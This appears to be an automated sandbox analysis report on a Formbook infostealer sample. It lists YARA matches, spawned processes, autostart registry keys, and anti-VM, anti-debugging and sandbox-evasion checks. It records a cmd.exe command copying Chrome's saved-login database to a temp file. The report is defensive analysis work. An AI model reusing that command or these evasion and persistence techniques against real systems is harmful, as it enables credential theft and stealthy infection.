Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@20/6@36/13

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_0042A11C GetLastError,FormatMessageA,

1_2_0042A11C

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_00409576 GetDiskFreeSpaceA,

1_2_00409576

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_0041A2E8 FindResourceA,

1_2_0041A2E8

Source: C:\Users\user\Desktop\AT113020.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6272:120:WilError_01

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\DB1

Jump to behavior

Source: C:\Users\user\Desktop\AT113020.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\AT113020.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\AT113020.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\explorer.exe

File read: C:\Users\user\Searches\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\AT113020.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\AT113020.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\AT113020.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\AT113020.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: AT113020.exe

ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\AT113020.exe

File read: C:\Users\user\Desktop\AT113020.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\AT113020.exe 'C:\Users\user\Desktop\AT113020.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: unknown	Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\AT113020.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\msdt.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: AT113020.exe

Static file information: File size 1375232 > 1048576

Source:	Binary string: ieinstal.pdbGCTL source: msdt.exe, 00000008.00000002.1016655468.00000000006E4000.00000004.00000020.sdmp
Source:	Binary string: msdt.pdbGCTL source: ieinstal.exe, 00000006.00000002.293259484.0000000004C90000.00000040.00000001.sdmp
Source:	Binary string: ieinstal.pdb source: msdt.exe, 00000008.00000002.1016655468.00000000006E4000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000002.00000002.292827660.000000000352F000.00000040.00000001.sdmp, ieinstal.exe, 00000006.00000002.285564970.0000000003050000.00000040.00000001.sdmp, msdt.exe, 00000008.00000002.1020258027.000000000473F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000003.285864876.00000000028B0000.00000004.00000001.sdmp, ieinstal.exe, 00000010.00000002.293780626.000000000332F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: ieinstal.exe, msdt.exe, 00000008.00000002.1020258027.000000000473F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000003.285864876.00000000028B0000.00000004.00000001.sdmp, ieinstal.exe, 00000010.00000002.293780626.000000000332F000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdb source: ieinstal.exe, 00000002.00000002.294312378.0000000005110000.00000040.00000001.sdmp
Source:	Binary string: msdt.pdb source: ieinstal.exe, 00000006.00000002.293259484.0000000004C90000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: ieinstal.exe, 00000002.00000002.294312378.0000000005110000.00000040.00000001.sdmp

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\AT113020.exe

1_2_0048ADC8

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0048D0AC push 0048D125h; ret	1_2_0048D11D
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004194F8 push ecx; mov dword ptr [esp], edx	1_2_004194FD
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0048D5D0 push 0048D65Dh; ret	1_2_0048D655
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00460068 push 00460094h; ret	1_2_0046008C
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0046E088 push 0046E0E2h; ret	1_2_0046E0DA
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0048C230 push 0048C256h; ret	1_2_0048C24E
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0047C358 push 0047C384h; ret	1_2_0047C37C
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0042638C push 004263B8h; ret	1_2_004263B0
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00450484 push ecx; mov dword ptr [esp], ecx	1_2_00450488
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00474568 push 004745DEh; ret	1_2_004745D6
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004425EC push 00442638h; ret	1_2_00442630
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00488600 push 0048864Ch; ret	1_2_00488644
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0040E61A push 0040E926h; ret	1_2_0040E91E
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00430618 push 004306E8h; ret	1_2_004306E0
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0041875E push 6C0041CCh; iretd	1_2_0041877D
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004167E8 push 0041685Eh; ret	1_2_00416856
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0040E7A0 push 0040E926h; ret	1_2_0040E91E
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00424816 push 004248C3h; ret	1_2_004248BB
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00424818 push 004248C3h; ret	1_2_004248BB
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004268D0 push 00426913h; ret	1_2_0042690B
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004068D2 push 0040692Fh; ret	1_2_00406927
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004068D4 push 0040692Fh; ret	1_2_00406927
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0043A91C push 0043A95Fh; ret	1_2_0043A957
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004729E0 push 00472A13h; ret	1_2_00472A0B
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0045CC0C push 0045CC72h; ret	1_2_0045CC6A
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00488CB8 push 00488D3Ah; ret	1_2_00488D32
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00426E80 push 00426EC3h; ret	1_2_00426EBB
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00449050 push 004490BBh; ret	1_2_004490B3
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004390CC push 00439104h; ret	1_2_004390FC
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0040F0F0 push 0040F11Ch; ret	1_2_0040F114
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0048D144 push 0048D1ECh; ret	1_2_0048D1E4

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\user\Desktop\AT113020.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

Jump to dropped file

Boot Survival:

Creates autostart registry keys with suspicious names

Source: C:\Users\user\Desktop\AT113020.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Accf

Jump to behavior

Creates multiple autostart registry keys

Source: C:\Windows\SysWOW64\msdt.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 7NF4IRG0T			Jump to behavior
Source: C:\Users\user\Desktop\AT113020.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Accf			Jump to behavior

Source: C:\Users\user\Desktop\AT113020.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Accf	Jump to behavior
Source: C:\Users\user\Desktop\AT113020.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Accf	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 7NF4IRG0T	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 7NF4IRG0T	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0046B900 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_0046B900
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0046C030 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	1_2_0046C030
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_0046C0F4 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,	1_2_0046C0F4
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00468398 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,	1_2_00468398
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00456848 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	1_2_00456848
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00457218 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	1_2_00457218
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_0046B900 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	5_2_0046B900
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_0046C030 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	5_2_0046C030
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_0046C0F4 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,	5_2_0046C0F4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_00468398 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,	5_2_00468398
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_00456848 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	5_2_00456848
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_00457218 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	5_2_00457218
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_00425E44 IsIconic,GetWindowPlacement,GetWindowRect,	5_2_00425E44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_00455F40 IsIconic,GetCapture,	5_2_00455F40

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\AT113020.exe

1_2_0045C27C

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	RDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 00000000001483D4 second address: 00000000001483DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 00000000026183D4 second address: 00000000026183DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 000000000014876E second address: 0000000000148774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 000000000261876E second address: 0000000002618774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 2_2_004086A0 rdtsc

2_2_004086A0

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Users\user\Desktop\AT113020.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		1_2_0046AB64
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		5_2_0046AB64

Found large amount of non-executed APIs

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	API coverage: 8.1 %
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	API coverage: 6.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 6532

Thread sleep time: -225000s >= -30000s

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

Code function: 5_2_00405DBC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

5_2_00405DBC

Source: explorer.exe, 00000003.00000000.256798347.000000000891C000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.256454933.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000002.287726771.00000000008C1000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWTI8
Source: explorer.exe, 00000003.00000002.1016614721.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000003.00000000.256859188.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000003.00000000.251940786.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000003.00000000.256454933.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.256454933.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.256859188.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000003.00000000.256454933.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

API call chain: ExitProcess graph end node

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 2_2_004086A0 rdtsc

2_2_004086A0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 2_2_00409900 LdrLoadDll,

2_2_00409900

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\AT113020.exe

1_2_0048ADC8

Contains functionality to read the PEB

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0343DB40 mov eax, dword ptr fs:[00000030h]	2_2_0343DB40
